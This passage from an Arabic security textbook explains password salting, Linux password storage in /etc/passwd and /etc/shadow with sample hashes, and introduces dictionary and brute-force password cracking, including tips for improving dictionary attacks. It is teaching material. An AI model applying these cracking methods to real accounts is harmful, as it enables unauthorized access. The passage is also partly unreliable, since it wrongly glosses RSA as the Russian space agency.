‫ﯾﺟب أن ﺗﻛون ﺳﻠﺳﻠﺔ اﻷﺣرف اﻟﻌﺷواﺋﯾﺔ ﻣزﯾﺞ ﻣن اﻷﺣرف اﻷﺑﺟدﯾﺔ اﻟرﻗﻣﯾﺔ‪ .‬ﻣﺳﺗوى اﻷﻣﺎن أو ﻗوة ﺣﻣﺎﯾﺔ ﻛﻠﻣﺎت اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك ﺿد‬
‫ھﺟﻣﺎت ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺧﺗﻠﻔﺔ ﺗﻌﺗﻣد ﻋﻠﻰ طول ﺳﻠﺳﻠﺔ اﻟﻌﺷواﺋﯾﺔ ﻟﻸﺣرف‪ .‬ھذه ﯾداﻓﻊ ﺿد ‪.pre-computed hash attacks‬‬

‫ﻓﻲ ﻋﻠم اﻟﺗﺷﻔﯾر‪ ،‬ﻓﺎن ‪ salting‬ﯾﺗﻛون ﻣن ﺑﺗﺎت ﻋﺷواﺋﯾﺔ )‪ (random bit‬اﻟﺗﻲ ﺗﺳﺗﺧدم ﻛﺄﺣد اﻟﻣدﺧﻼت إﻟﻰ وظﯾﻔﺔ ﻓﻲ اﺗﺟﺎه واﺣد وﻏﯾرھﺎ‬
‫ﻣن اﻟﻣدﺧﻼت ھو ﻛﻠﻣﺔ اﻟﺳر‪ .‬ﺑدﻻ ﻣن ﻛﻠﻣﺎت اﻟﺳر‪ ،‬ﻓﻧﺎﺗﺞ وظﯾﻔﺔ ﻓﻲ اﺗﺟﺎه واﺣد ﯾﻣﻛن ﺗﺧزﯾﻧﮭﺎ واﺳﺗﺧداﻣﮭﺎ ﻟﻣﺻﺎدﻗﺔ اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬ﯾﻣﻛن أﯾﺿﺎ‬
‫ﺿم ‪ salting‬ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور ﻋن طرﯾﻖ ‪ key derivation function‬ﻟﺗوﻟﯾد ﻣﻔﺗﺎح ﻟﻼﺳﺗﺧدام ﻣن ﻗﺑل اﻟﻧص اﻟﻣﺷﻔر او ﻏﯾرھﺎ ﻣن‬
‫ﺧوارزﻣﯾﺎت اﻟﺗﺷﻔﯾر‪.‬‬

‫ﻣﻊ ھذه اﻟﺗﻘﻧﯾﺔ ﯾﻣﻛن أن ﺗﺗوﻟد ھﺎﺷﺎت ﻣﺧﺗﻠﻔﺔ ﻟﻧﻔس ﻛﻠﻣﺔ اﻟﻣرور‪ .‬وھذا ﯾزﯾد ﻣن ﺻﻌوﺑﺔ اﻟﻣﮭﻣﺔ ﻋﻠﻰ اﻟﻣﮭﺎﺟم ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر اﻟﺻﻌﺑﺔ‪.‬‬
‫ﻓﻲ ھذا اﻟﻣﺛﺎل‪ ،‬واﺛﻧﯾن ﻣن اﻟﻣﺳﺗﺧدﻣﯾن أﻟﯾس وﺳﯾﺳﯾل ﻟﮭﺎ ﻧﻔس ﻛﻠﻣﺎت اﻟﺳر وﻟﻛن ﻣﻊ ﻗﯾم ھﺎش ﻣﺧﺗﻠﻔﺔ‪ .‬ﺣﯾث ﯾﺗم إﻧﺷﺎء ھﺎش ﻋﺷواﺋﻲ ﻟﻛل‬
‫ﻣﺳﺗﺧدم ﻋﻠﻰ ﺣدة‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪320‬‬

‫‪Linux Authentication‬‬

‫ﺗﻨﻔﯿﺬ اﻟﺴﯿﺎﺳﺎت اﻟﺘﻲ ﺗﺘﺤﻜﻢ ﻓﻲ ﻛﯿﻔﯿﺔ اﻟﻮﻟﻮج إﻟﻰ ﻣﻮارد ﺟﮭﺎز اﻟﺘﺸﻐﯿﻞ‪ ،‬وﻣﺪى ھﺬا اﻟﻮﻟﻮج‪ ،‬أﻣﺮ أﺳﺎﺳﻲ ﻷﻣﻦ اﻟﻜﻤﺒﯿﻮﺗﺮ‪ .‬أﻧﻈﻤﺔ اﻟﻜﻤﺒﯿﻮﺗﺮ اﻟﺤﺪﯾﺜﺔ‬
‫ﺗﻨﻔﯿﺬ ھﺬه اﻟﺴﯿﺎﺳﺎت ﺑﺎﺳﺘﺨﺪام ﻧﻤﻮذج اﻟﻤﺴﺘﺨﺪم])‪ ،[(user_model‬اﻟﺬي ﯾﻌﯿﻦ اﻣﺘﯿﺎزات ﻣﻌﯿﻨﺔ ﻟﺒﻌﺾ اﻟﻤﺴﺘﺨﺪﻣﯿﻦ‬

‫ﻧﻤﺎذج اﻟﻤﺴﺘﺨﺪم ])‪ ،[(user_model‬ﺗﻌﻤﻞ ﻋﻠﻰ اﻟﺠﻤﻊ ﺑﯿﻦ إﺟﺎﺑﺘﯿﻦ ﻋﻠﻰ ﺳﺆاﻟﯿﻦ ﻣﺨﺘﻠﻔﯿﻦ‪:‬‬
‫اﻷول ھﻮ اﻻﺳﺘﯿﺜﺎق‪/‬اﻟﻤﺼﺎدﻗﺔ ])‪ :[(authentication‬ھﻞ ھﺬا ھﻮ اﻟﻤﺴﺘﺨﺪم اﻟﺬي أﻋﺘﻘﺪ أﻧﮫ ھﻮ؟‬
‫ً‬
‫واﻟﺜﺎﻧﻲ ھﻮ اﻟﺘﺼﺮﯾﺢ])‪ :[(Authorization‬اﻵن أﻧﻨﻲ ﻣﻘﺘﻨﻊ ﺑﺄﻧﻨﻲ أﻋﺮف ھﻮﯾﺔ ھﺬا اﻟﻤﺴﺘﺨﺪم‪ ،‬ﻣﺎ ھﻲ اﻟﻤﻮارد اﻟﺘﻲ ﯾﻨﺒﻐﻲ أن ﯾﻜﻮن ﻗﺎدرا ﻋﻠﻰ‬
‫اﻟﻮﺻﻮل إﻟﯿﮭﺎ؟‬
‫‪ -‬اﻟﺮد ﻋﻠﻰ اﻟﺴﺆال اﻷول ﻣﻦ ﻗﺒﻞ ]‪[user authentication‬‬
‫‪ -‬اﻟﺮد ﻋﻠﻰ اﻟﺜﺎﻧﻲ ﻣﻦ ﺧﻼل رﺑﻂ ﻣﻌﻠﻮﻣﺎت اﻟﺤﺴﺎب ])‪ [(account information‬ﻣﻊ ھﻮﯾﺔ اﻟﻤﺼﺎدﻗﺔ‪.‬‬

‫ﺗﺎرﯾﺧﯾﺎ‪ ،‬اﺳﺗﺧدﻣت أﻧظﻣﺔ ﯾوﻧﻛس ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ‪ /etc/passwd‬ﻟﻠرد ﻋﻠﻰ ﻛل اﻷﺳﺋﻠﺔ‪.‬‬

‫ﻣﺤﺘﻮﯾﺎت ‪ /etc/passwd‬ﺗﻘﺪم ﻛﻞ ﻣﻦ اﻟﻤﺼﺎدﻗﺔ ])‪ [(authentication‬وﻣﻌﻠﻮﻣﺎت اﻟﺤﺴﺎب ])‪.[(account information‬‬

‫ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﻤﺸﻔﺮة )ﻓﻲ اﻟﺤﻘﻞ اﻟﺜﺎﻧﻲ( ﺗﻮﻓﺮ ﻋﻤﻠﯿﺔ اﻟﻤﺼﺎدﻗﺔ ])‪" :[(authentication‬إذا ﻛﻨﺖ ﺣﻘﺎ أﻟﻔﯿﺲ‪ ،‬أﻋﻄﻨﻨﻲ ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﻔﯿﺲ"‪.‬‬
‫إذا ﺣﺪﺛﺖ اﻟﻤﺼﺎدﻗﺔ ﺑﺸﻜﻞ ﺻﺤﯿﺢ‪ ،‬ﻓﺎن اﻟﻨﻈﺎم ﯾﻔﺘﺮض أن ﻣﻦ ﻗﺎم ﺑﺘﺴﺠﯿﻞ اﻟﺪﺧﻮل ھﻮ ﺣﻘﺎ أﻟﻔﯿﺲ‪ .‬وﺑﻤﺠﺮد إﻧﺸﺎء ﺑﯿﺎﻧﺎت اﻟﻤﺴﺘﺨﺪم‪ ،‬ﻓﺎن اﻟﻤﻠﻒ‬
‫‪ /etc/passwd‬ﯾﻮﻓﺮ ﻣﻌﻠﻮﻣﺎت أﺧﺮى ﻋﻦ اﻟﻤﺴﺘﺨﺪم أﻟﻔﯿﺲ‪ :‬ﻣﺜﻞ ‪ UID‬و‪ GID‬و‪ home directory‬وﻧﻮع اﻟﺸﻞ اﻻﻓﺘﺮاﺿﻲ ﻟﮫ‪.‬‬

‫ﻓﯿﻤﺎ ﺑﻌﺪ أﺻﺒﺤﺖ أﻧﻈﻤﺔ ﯾﻮﻧﻜﺲ أﻛﺜﺮ ﻗﻠﻘﺎ ﻋﻠﻰ اﻷﻣﻦ‪ ،‬وﻗﺪ وﺟﮭﺖ ھﺬه اﻟﺮﻗﺎﺑﺔ ﻣﻊ ﺗﻘﻨﯿﺔ ﺗﺴﻤﻰ ﻛﻠﻤﺎت اﻟﺴﺮ اﻟﻈﻞ])‪: [(shadow passwords‬‬
‫ﺣﯿﺚ ﺗﻢ ﻧﻘﻞ ﻛﻠﻤﺎت اﻟﻤﺮور إﻟﻰ اﻟﻤﻠﻒ ]‪ [/etc/shadow‬ﻣﻠﻒ أﻛﺜﺮ أﻣﻨﺎ‪ ،‬ﺛﻢ ﯾﻀﻊ ﻣﻜﺎﻧﮫ اﻟﺮﻣﺰ ‪ X‬ﻓﻲ اﻟﻤﻠﻒ ]‪.[/etc/passwd‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪321‬‬

‫ﻣﺎذا ﯾﺤﺪث ﻋﻨﺪ ﺗﻌﯿﯿﻦ ﻛﻠﻤﺔ ﻣﺮور اﻟﻔﯿﺲ "‪“apple‬ﻣﻊ اﻷﻣﺮ ‪passwd‬؟‬

‫اﻷﻣﺮ ‪ passwd‬ﯾﻌﻤﻞ ﻋﻠﻰ إﺟﺮاء اﻟﺨﻄﻮات اﻟﺘﺎﻟﯿﺔ‪.‬‬


‫اﻟﻤﺴﺘﺨﺪم ﯾﻌﻤﻞ ﻋﻠﻰ ﺗﻮﻓﯿﺮ ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﻐﯿﺮ ﻣﺸﻔﺮة])‪"apple" :[(plaintext‬‬ ‫‪-‬‬
‫اﻷﻣﺮ ‪passwd‬ﯾﻌﻤﻞ ﻋﻠﻰ إﻧﺸﺎء ﺣﺮﻓﯿﻦ ﺑﺸﻜﻞ ﻋﺸﻮاﺋﻲ‪ ،‬واﻟﺘﻲ ﺗﺴﻤﻰ ﻣﻠﺢ ]‪ [salt‬ﻓﺘﺼﺒﺢ ﻛﻠﻤﺔ اﻟﺴﺮ ﻣﺜﻼ ]‪[f8apple‬‬ ‫‪-‬‬
‫ﺛﻢ ﯾﺘﻢ اﺳﺘﺨﺪام ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﻤﻤﻠﺤﺔ ]‪ [salted password‬ﻟﺘﺸﻔﯿﺮھﺎ ﻋﻦ طﺮﯾﻖ اﻟﺴﻠﺴﻠﺔ اﻟﻤﻌﺮوﻓﺔ ﻋﺎﻟﻤﯿﺎ ﻣﺤﺪدة ﻣﺴﺒﻘﺎ )ﻋﺎدة‬ ‫‪-‬‬
‫ﻣﺠﺮد ﺣﻔﻨﺔ ﻣﻦ اﻷﺻﻔﺎر(‪ ،‬ﻣﻤﺎ أﺳﻔﺮ ﻋﻦ ‪ 11‬ﺣﺮﻓﺎ ]‪[cyphertext] .[aHBT9lIoaZc‬‬
‫اﻷﻣﺮ ‪ passwd‬ﯾﻌﻤﻞ ﻋﻠﻰ إﺿﺎﻓﺔ ﺣﺮﻓﯿﻦ ﻣﻦ اﻟﻤﻠﺢ إﻟﻰ‪ ، cyphertext‬وﯾﺨﺰن ﺳﻮاء ﻓﻲ اﻟﻤﻠﻒ‪/etc/passwd‬‬ ‫‪-‬‬
‫ﻻﺣﻆ أن ﻣﻠﻒ‪ /etc/passwd‬ﯾﺨﺰن ﻓﻲ اﻟﻮاﻗﻊ ﻗﻄﻌﺘﯿﻦ ﻣﻦ اﻟﻤﻌﻠﻮﻣﺎت ﻓﻲ ﺣﻘﻞ ﻛﻠﻤﺔ اﻟﻤﺮور‪.‬وھﻤﺎ ‪ 11‬ﺣﺮﻓﺎ اﻷﺧﯿﺮة ھﻲ‬ ‫‪-‬‬
‫)"‪ ،cyphertext ("aHBT9lIoaZc‬وأول ﺣﺮﻓﯿﻦ ھﻢ ﻣﻠﺢ )"‪.("F8‬‬

‫ﻣﺎذا ﯾﺤﺪث ﻋﻨﺪﻣﺎ ﯾﺬھﺐ اﻟﻨﻈﺎم إﻟﻰ ﻣﺼﺎدﻗﮫ اﻟﻤﺴﺘﺨﺪم أﻟﻔﯿﺲ؟‬


‫اﻟﻤﺴﺘﺨﺪم اﻟﻔﯿﺲ ﯾﻌﻤﻞ ﻋﻠﻰ ﺗﺰود ﻛﻠﻤﺔ اﻟﺴﺮ اﻟﻐﯿﺮ ﻣﺸﻔﺮة‪"apple" :‬‬ ‫‪-‬‬

‫اﻟﻨﻈﺎم ﯾﻘﻮم ﺑﺎﻟﺒﺤﺚ ﻋﻦ اﻟﺤﺮﻓﯿﻦ ﻣﻦ اﻟﻤﻠﺢ ]‪[salt‬ﻣﻦ اﻟﻤﻠﻒ ‪ /etc/passwd‬وﯾﻘﻮم ﺑﺈﺿﺎﻓﺘﮫ إﻟﻰ ﻛﻠﻤﺔ اﻟﻤﺮور‪.‬‬ ‫‪-‬‬
‫ﯾﺴﺘﺨﺪم ﻧﻈﺎم ﻛﻠﻤﺔ اﻟﻤﺮور إﻧﺸﺎء ‪ cyphertext‬ﻣﻦ ﻛﻠﻤﺔ اﻟﺴﺮ اﻟﻤﻤﻠﺤﺔ ]‪ [salted password‬واﻟﻰ ﯾﻨﺘﺞ ﻣﻜﻮن ‪ 11‬ﺣﺮف‪.‬‬ ‫‪-‬‬
‫ﺛﻢ ﯾﻘﻮم اﻟﻨﻈﺎم ﺑﻤﻘﺎرﻧﺔ ‪ cyphertext‬إﻟﻰ ﻣﺎ ﺗﻢ ﺗﺨﺰﯾﻨﮫ ﻓﻲ ‪ ./etc/passwd‬إذا ﻛﺎﻧﺖ ﺗﻄﺎﺑﻖ‪ ،‬ﺗﺴﻤﺢ ﻟﻠﻤﺴﺘﺨﺪم ﺑﺎﻟﻮﻟﻮج‪.‬‬ ‫‪-‬‬

‫‪Password Management‬‬
‫ﺟﻌﻠﺖ أﻧﻈﻤﺔ ﻟﯿﻨﻜﺲ اﻟﺤﺪﯾﺜﺔ اﺛﻨﯿﻦ ﻣﻦ اﻟﺘﺤﺴﯿﻨﺎت ﻟﻠﺘﻘﻨﯿﺔ اﻟﺘﻘﻠﯿﺪﯾﺔ اﻟﻤﺬﻛﻮرة أﻋﻼه‪.‬‬
‫أوﻻ‪ ،‬وﻛﻤﺎ ﺳﺒﻖ ذﻛﺮه‪ ،‬أﻧﻈﻤﺔ ﻟﯿﻨﻜﺲ اﻟﺤﺪﯾﺜﺔ اﺳﺘﺨﺪام ﻛﻠﻤﺎت اﻟﻤﺮور اﻟﻈﻞ])‪ [(shadow password‬ﻟﺘﺨﺰﯾﻦ‪، cypthertext‬‬
‫ﺑﺤﯿﺚ ﺣﺘﻰ ﻛﻠﻤﺎت اﻟﺴﺮ اﻟﻤﺸﻔﺮة ﻟﯿﺴﺖ ﻣﺘﺎﺣﺔ ﻟﻠﺠﻤﮭﻮر‪.‬‬
‫ﺛﺎﻧﯿﺎ‪ ،‬أﻧﻈﻤﺔ ﻟﯿﻨﻜﺲ اﻟﯿﻮم اﺳﺘﺨﺪام ﺧﻮارزﻣﯿﺔ ‪ MD5‬أﻛﺜﺮ ﻧﻀﺠﺎ‪.‬‬
‫ﯾﺴﺘﺨﺪم ﯾﻮﻧﻜﺲ ﺑﺮوﺗﻮﻛﻮل اﻟﺘﺸﻔﯿﺮ اﻟﺘﻘﻠﯿﺪﯾﺔ واﻟﺘﻲ ﺑﺪورھﺎ ﺗﺴﺘﺨﺪم ﻣﻌﺪﻟﺔ ‪ DES‬ﺧﻮارزﻣﯿﺔ اﻟﺘﺸﻔﯿﺮ ﻋﻠﻰ أﺳﺎس ﻣﻔﺘﺎح ﺑﺖ ‪.56‬‬
‫وﻧﺘﯿﺠﺔ ﻟﺬﻟﻚ‪ ،‬أﺻﺒﺤﺖ ﻛﻠﻤﺎت اﻟﺴﺮ ﻣﺤﺪودة ﻓﻘﻂ ‪ 8‬أﺣﺮف ﻣﻦ اﻟﻨﻮع ‪ 8) ASCII:‬أﺣﺮف( * )‪ 7‬ﺑﺖ ‪ /‬ﺣﺮف( = )‪ 56‬ﺑﺖ(‪.‬‬

‫أﻧﻈﻤﺔ ﻟﯿﻨﻜﺲ اﻟﯿﻮم ﺗﺴﺘﺨﺪم ﻛﻠﻤﺔ اﻟﺴﺮ ذات ﺧﻮارزﻣﯿﺔ اﻟﺘﺸﻔﯿﺮ ‪ ،[MD5 password] MD5‬واﻟﺬي ﯾﺴﺘﺨﺪم ﻟﻠﺘﺸﻔﯿﺮ اﻷﻛﺜﺮ ﻧﻀﺠﺎ واﻟﺬي‬
‫ﯾﺴﺘﻨﺪ إﻟﻰ ﻣﻔﺘﺎح أﻛﺒﺮ ﺑﻜﺜﯿﺮ‪.‬‬
‫اﻷداة ‪ system-config-authentication‬ﺗﺳﺗﺧدم ﻟﺗﺣوﯾل ﺑﯾن أي ﻧظﺎم ﻣﺳﺗﺧدم ﻓﻲ ﺗﺷﻔﯾر اﻟرﻗم اﻟﺳري ﺳواء ‪ md5 password‬أو‬
‫‪ shadow password‬ﻓﻲ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل رﯾدھﺎت وﻓﯾدورا‪.‬‬

‫أوﻻ‪ ،‬ﯾﺘﻢ ﺗﺨﺰﯾﻦ ‪ cyphertext‬ﻓﻲ اﻟﻤﻠﻒ ‪./etc/shadow‬‬

‫ﺛﺎﻧﯿﺎ‪ ،‬ﻛﻠﻤﺔ اﻟﺴﺮ اﻟﻤﺸﻔﺮة ‪ MD5‬اﻵن ﺗﻨﻘﺴﻢ إﻟﻰ ﺛﻼﺛﺔ ﻣﺠﺎﻻت ﯾﻤﻜﻦ ﺗﻤﯿﯿﺰھﺎ ﺑﺴﮭﻮﻟﺔ‪ ،‬ﺗﺤﺪد ﺑﻮاﺳﻄﺔ ﻋﻼﻣﺔ اﻟﺪوﻻر )"‪.("$‬‬
‫اﻟﺤﻘﻞ اﻷول )"‪ ("1‬ھﻮ ﻣﻌﺮف اﻟﺒﺮوﺗﻮﻛﻮل‪ ،‬وﺗﻮﻓﯿﺮ آﻟﯿﺔ ﻟﻠﺘﺮﺣﯿﻞ ﺑﺴﮭﻮﻟﺔ إﻟﻰ ﺑﺮوﺗﻮﻛﻮﻻت ﻣﺨﺘﻠﻔﺔ ﻓﻲ اﻟﻤﺴﺘﻘﺒﻞ ‪. MD5‬وھﻮ ﺑﺮوﺗﻮﻛﻮل "‪".1‬‬
‫اﻟﺤﻘﻞ اﻟﺜﺎﻧﻲ‪ ،"CBYGbXRT" ،‬ھﻮ اﻟﻤﻠﺢ‪ ،‬واﻟﺘﻲ ﺗﻮﺳﻌﺖ اﻵن إﻟﻰ ‪ 8‬أﺣﺮف‪.‬‬
‫اﻟﺤﻘﻞ اﻷﺧﯿﺮ‪ ،"xTMRC01udINgd1LH/9quu1" ،‬ھﻮ ‪ cyphertext‬ﻧﺘﯿﺠﺔ ﻟﻠﺘﺸﻔﯿﺮ‪.‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪322‬‬

‫ﺗﻘﻧﯾﺎت ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ‪PASSWORD CRACKING TECHNIQUES‬‬

‫‪ Password cracking‬ھﻲ اﻟﺗﻘﻧﯾﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻻﻛﺗﺷﺎف ﻛﻠﻣﺎت اﻟﻣرور‪ .‬ھذا ھو اﻟﺳﺑﯾل ﻟﻛﺳب اﻻﻣﺗﯾﺎزات اﻟﻛﻼﺳﯾﻛﯾﺔ ﻟﻧظﺎم اﻟﻛﻣﺑﯾوﺗر أو‬
‫اﻟﺷﺑﻛﺔ‪ .‬اﻟﻧﮭﺞ اﻟﻣﺷﺗرك ﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور ھو اﺳﺗﻣرار ﻣﺣﺎوﻟﺔ ﺗﺧﻣﯾن ﻛﻠﻣﺔ اﻟﻣرور ﻣﻊ ﺗوﻟﯾﻔﺎت ﻣﺧﺗﻠﻔﺔ ﺣﺗﻰ ﺗﺣﺻل اﻟﻰ واﺣدة ﺻﺣﯾﺣﺔ‪.‬‬
‫ھﻧﺎك ﺧﻣﺳﺔ أﺳﺎﻟﯾب ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪.‬‬

‫‪DICTIONARY ATTACKS‬‬

‫ﻓﻲ ‪ ،dictionary attack‬ﯾﺗم ﺗﺣﻣﯾل ﻣﻠف ‪dictionary‬إﻟﻰ ﺗطﺑﯾﻖ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور )‪ (Cracking application‬اﻟذي ﯾﺳﺗﺧدم ﺿد‬
‫ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬ھذا اﻟﻣﻠف ھو ﻣﻠف ﻧﺻﻲ ﯾﺣﺗوي ﻋﻠﻰ ﻋدد ﻣن ﻛﻠﻣﺎت اﻟﻘﺎﻣوس )‪ .(dictionary word‬ﯾﺳﺗﺧدم اﻟﺑرﻧﺎﻣﺞ ﻛل ﻛﻠﻣﺔ‬
‫ﻣوﺟودة ﻓﻲ اﻟﻘﺎﻣوس ﻟﻠﻌﺛور ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﺳر‪ Dictionary attack .‬أﻛﺛر ﻓﺎﺋدة ﻣن ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ‪(brute forcing attack).‬‬
‫وﻟﻛن ھذا اﻟﮭﺟوم ﻻ ﯾﻌﻣل ﻣﻊ اﻷﻧظﻣﺔ اﻟﺗﻲ ﺗﺳﺗﺧدم ‪.passphrases‬‬

‫ھذا اﻟﮭﺟوم ﯾﻣﻛن ﺗطﺑﯾﻘﮫ ﻓﻲ ظل ﺣﺎﻟﺗﯾن‪:‬‬


‫‪ -‬ﻓﻲ ﺗﺣﻠﯾل اﻟﺷﻔرات)‪ ، (cryptanalysis‬ﺣﯾث ﯾﺗم اﺳﺗﺧداﻣﮫ ﻟﻣﻌرﻓﺔ ﻣﻔﺗﺎح ﻓك اﻟﺗﺷﻔﯾر ﻟﻠﺣﺻول ﻋﻠﻰ اﻟﻧص اﻟﻌﺎدي ﻣن ﻧص ﻣﺷﻔر‬
‫)‪.(ciphertext‬‬
‫‪ -‬ﻓﻲ أﻣن اﻟﻛﻣﺑﯾوﺗر‪ ،‬ﻟﺗﺟﻧب ﻣﺻﺎدﻗﺔ )‪(authentication‬اﻟوﺻول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻋن طرﯾﻖ ﺗﺧﻣﯾن ﻛﻠﻣﺎت اﻟﺳر‪.‬‬

‫طرﯾﻘﺔ ﺗﺣﺳﯾن ﻧﺟﺎح ھﺟوم اﻟﻘﺎﻣوس‪: dictionary attack‬‬


‫‪ -‬اﺳﺗﺧدام ﻋدد ﻣن ‪ dictionaries‬ﻣﺛل ‪ Technical dictionaries‬و‪ foreign dictionaries‬ﻣﻣﺎ ﯾﺳﺎﻋد ﻋﻠﻰ اﺳﺗرﺟﺎع ﻛﻠﻣﺔ‬
‫اﻟﻣرور اﻟﺻﺣﯾﺣﺔ‬
‫‪ -‬اﺳﺗﺧدام ﻣﻌﺎﻟﺞ اﻟﻧﺻوص )‪ (string manipulation‬ﻋﻠﻰ ‪ ،dictionary‬ﯾﻌﻧﻲ إذا ﻛﺎن اﻟﻘﺎﻣوس ﯾﺣﺗوي ﻋﻠﻰ ﻛﻠﻣﺔ ‪system‬‬
‫ﻓﺎن ﺳوف ﯾﺣﺎول ﻣﻌﺎﻟﺟﺔ اﻟﺳﻠﺳﻠﺔ واﺳﺗﺧدام" ‪" metsys‬وﻏﯾرھﺎ‪.‬‬

‫ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ‪BRUTE FORCING ATTACKS‬‬


‫ﺧوارزﻣﯾﺎت اﻟﺗﺷﻔﯾر )‪ (cryptographic algorithms‬ﯾﺟب أن ﺗﺻﻠب ﺑﻣﺎ ﻓﯾﮫ اﻟﻛﻔﺎﯾﺔ ﻣن أﺟل ﻣﻧﻊ ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ)‪. (brute-force attack‬‬
‫ﺗﻌرﯾﻔﮫ ﻛﻣﺎ ذﻛرت وﻛﺎﻟﺔ اﻟﻔﺿﺎء اﻟروﺳﯾﺔ)‪ " :(RSA‬اﻟﺑﺣث اﻟﺣﺻري ﻋن اﻟﻣﻔﺎﺗﯾﺢ)‪ ، (Exhaustive key-search‬أو ﺑﺣث اﻟﻘوة اﻟﻐﺎﺷﻣﺔ‬
‫)‪ ،(brute-force search‬ھو اﻷﺳﻠوب اﻷﺳﺎﺳﻲ ﻟﻣﺣﺎوﻟﺔ اﺳﺗﺧدام ﻛل ﻣﻔﺗﺎح ﻣﻣﻛن ﺑدوره ﺣﺗﻰ ﯾﺗم اﻟﺗﻌرف ﻋﻠﻰ اﻟﻣﻔﺗﺎح اﻟﺻﺣﯾﺢ" ‪.‬‬

‫ﻋﻧدﻣﺎ ﯾﺣﺎول ﺷﺧص ﻣﺎ ﯾﻧﺗﺞ ﻛل ﻣﻔﺗﺎح ﺗﺷﻔﯾر واﺣد ﻟﻠﺑﯾﺎﻧﺎت ﺣﺗﻰ ﯾﺗم اﻟﻛﺷف ﻋن اﻟﻣﻌﻠوﻣﺎت اﻟﻣطﻠوﺑﺔ‪ ،‬وھذا ﻣﺎ ﯾطﻠﻖ ﻋﻠﯾﮫ ھﺟوم اﻟﻘوة‬
‫اﻟﻐﺎﺷﻣﺔ‪ .‬ﺣﺗﻰ ھذا اﻟﺗﺎرﯾﺦ‪ ،‬ﺗم ﺗﻧﻔﯾذ ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﻣن ﻗﺑل أوﻟﺋك اﻟذﯾن ﻟدﯾﮭم ﻣﺎ ﯾﻛﻔﻲ ﻣن ﻗوة اﻟﻣﻌﺎﻟﺟﺔ‪.‬‬
‫ﺣﻛوﻣﺔ اﻟوﻻﯾﺎت اﻟﻣﺗﺣدة )ﻓﻲ ﻋﺎم ‪ (1977‬ﺗﻌﺗﻘد أن ﻣﻌﯾﺎر ﺗﺷﻔﯾر اﻟﺑﯾﺎﻧﺎت‪ 56‬ﺑت )‪ (DES‬ﻛﺎﻓﻲ ﻟردع ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ‪ ،‬وﻗﺎﻟت ﺑﺄﻧﮫ ﺗم‬
‫اﺧﺗﺑﺎر ذﻟك ﻋﻠﻰ ﻣﺟﻣوﻋﺎت ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء اﻟﻌﺎﻟم‪.‬‬
‫ﺗﺣﻠﯾل اﻟﺷﻔرات ھو ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ﻋﻠﻰ اﻟﺗﺷﻔﯾر ﻟﺑﺣث اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ﻋﻠﻰ‪ . keyspace‬وﺑﻌﺑﺎرة أﺧرى ھو اﺧﺗﺑﺎر ﺟﻣﯾﻊ اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ‬
‫ﻟدﯾﻧﺎ ﻓﻲ ﻣﺣﺎوﻟﺔ ﻻﺳﺗرداد اﻟﻧص اﻟﻌﺎدي اﻟذي اﺳﺗﺧدم ﻹﻧﺗﺎج اﻟﻧص اﻟﻣﺷﻔر‪ .‬اﻛﺗﺷف اﻟﻣﻔﺗﺎح أو اﻟﻧص اﻟﻌﺎدي ﻣﻊ وﺗﯾرة أﺳرع ﺑﺎﻟﻣﻘﺎرﻧﺔ ﻣﻊ‬
‫ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ﯾﻣﻛن اﻋﺗﺑﺎر وﺳﯾﻠﺔ ﻟﻛﺳر اﻟﻧص اﻟﻣﺷﻔر]‪ .[cipher‬اﻟﻧص اﻟﻣﺷﻔر]‪ [cipher‬ھو اﻣن ﻓﻲ ﺣﺎﻟﺔ ﻋدم وﺟود أي طرﯾﻘﺔ‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪323‬‬

‫ﻟﻛﺳر ھذا اﻟﺗﺷﻔﯾر ﻏﯾر ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ‪ .‬ﻓﻲ اﻟﻐﺎﻟب‪ ،‬ﻛل اﻟﻧﺻوص اﻟﻣﺷﻔر )‪ (ciphers‬ﻗﺎﺻره ﻋﻠﻰ اﻣن اﻟﻌﻣﻠﯾﺔ اﻟرﯾﺎﺿﯾﺔ اﻟﻣﺳﺗﺧدم ﻓﻲ‬
‫ﻋﻣﻠﯾﺔ اﻟﺗﺷﻔﯾر‪.‬‬
